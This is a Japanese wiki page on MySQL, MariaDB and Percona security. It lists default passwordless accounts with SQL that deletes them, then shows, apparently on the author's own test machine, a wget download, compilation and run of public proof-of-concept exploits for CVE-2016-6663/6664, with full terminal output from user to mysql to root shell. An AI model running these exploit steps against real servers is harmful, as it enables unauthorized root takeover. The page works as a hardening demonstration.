flagflag  
Page Top

MySQL, MariaDB, Percona anchor.png

  • 該当マシンにアカウントがあり,データベースのアクセス(書き込み)可能な場合,Root権限を奪取される
  • MySQL の初期ユーザ等が残っている場合は特に危険.
Page Top
デフォルトユーザ anchor.png
  • パスワードなし,ユーザ名なしのデータはインストール時に削除すべき.
MariaDB [(none)]> use mysql;
MariaDB [mysql]> select Host,User,Password from user;
+-----------+------+-------------------------------------------+
| Host      | User | Password                                  |
+-----------+------+-------------------------------------------+
| localhost | root | *1B1F13007F2FA68140D751B563EB49E0186A116B |
| rigel-b   | root |                                           |
| 127.0.0.1 | root |                                           |
| ::1       | root |                                           |
| localhost |      |                                           |
| rigel-b   |      |                                           |
+-----------+------+-------------------------------------------+
  • 以下のコマンドで削除しておく
MariaDB [(none)]> use mysql;
MariaDB [mysql]> delete from user where user='';  
MariaDB [mysql]> delete from user where password='';
Page Top
mysql ユーザアカウントのダッシュ anchor.png
$ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c
$ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/local/mysql/include/mysql -L/usr/local/mysql/lib -lmysqlclient
[iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test

MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
mysql-privesc-race.c (ver. 1.0)

CVE-2016-6663 / CVE-2016-5616

For testing purposes only. Do no harm.

Discovered/Coded by:

Dawid Golunski 
http://legalhackers.com


[+] Starting the exploit as: 
uid=502(iseki) gid=100(users) 所属グループ=100(users)

[+] Connecting to the database `test` as @localhost

[+] Creating exploit temp directory /tmp/mysql_privesc_exploit

[+] Creating mysql tables 

DROP TABLE IF EXISTS exploit_table 
DROP TABLE IF EXISTS mysql_suid_shell 
CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 
CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 

[+] Copying bash into the mysql_suid_shell table.
   After the exploitation the following file/table will be assigned SUID and executable bits : 
-rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD

[+] Entering the race loop... Hang in there...
->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->

[+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: 

-rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD

[+] Spawning the mysql SUID shell now... 
   Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)

mysql_suid_shell.MYD-4.1$ whoami
mysql
Page Top
mysql アカウントからの root アカウントのダッシュ anchor.png
mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err 

MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit 
mysql-chowned.sh (ver. 1.0)

CVE-2016-6664 / CVE-2016-5617

Discovered and coded by: 

Dawid Golunski 
http://legalhackers.com 

[+] Starting the exploit as 
uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users)

[+] Target MySQL log file set to /var/mysql/rigel-b.err

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at: 
-rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh

[+] Symlink created at: 
lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload

[+] Waiting for MySQL to re-open the logs/MySQL service restart...

[+] Waiting for MySQL to re-open the logs/MySQL service restart...
./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません
Do you want to kill mysqld process  to instantly get root? :) ? [y/n] y
Got it. Executing 'killall mysqld' now...

[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: 
-rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains: 
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh

[+] Rootshell got assigned root SUID perms at: 
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh

Got root! The database server has been ch-OWNED ! 

[+] Spawning the rootshell /tmp/mysqlrootsh now!

mysqlrootsh-4.1# whoami
root
Front page   Freeze Diff Backup Copy Rename Reload   New List of Pages Search Recent changes   Help   RSS of recent changes (RSS 1.0) RSS of recent changes (RSS 2.0) RSS of recent changes (RSS Atom)
Counter: 1755, today: 1, yesterday: 1
Last-modified: 2016-11-11 (Fri) 15:46:20 (JST) (2730d) by iseki
Links: MariaDB MySQL Percona
Page aliases: None
Page owner: iseki
Site admin: admin

Site Search


Advanced Search

Login
Username:

Password:


Lost Password?
Register now!!

Sub Menu

Books

mini Calendar
Last MonthMay 2024Next Month
Su Mo Tu We Th Fr Sa
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
Today

Who's Online
107 user(s) are online (23 user(s) are browsing xpwiki)

Members: 0
Guests: 107

more...

Access Counter
Today : 1400114001140011400114001
Yesterday : 1412914129141291412914129
Total : 2345961123459611234596112345961123459611234596112345961123459611
Powered by XOOPS Cube 2.1© 2001-2006 XOOPS Cube Project
Design by XoopsDesign.com